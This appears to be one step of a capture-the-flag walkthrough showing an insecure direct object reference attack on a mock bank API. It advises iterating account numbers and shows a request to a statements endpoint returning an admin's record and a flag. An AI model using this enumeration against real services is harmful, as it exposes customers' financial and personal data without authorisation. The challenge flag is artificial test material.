Iterate through account numbers to find the one containing the flag. Try accounts near your own, or well-known numbers like 10000, 99999.
Command / Input
GET /api/statements?account=10001
Output
{"account":"10001","owner":"Admin","flag":"HackrGG{f1rstb4nk_1d0r_4cc0unt_st4t3m3nt}"}
⚑ In a real attack this exposes full transaction history, balances, and personal data for every customer on the platform.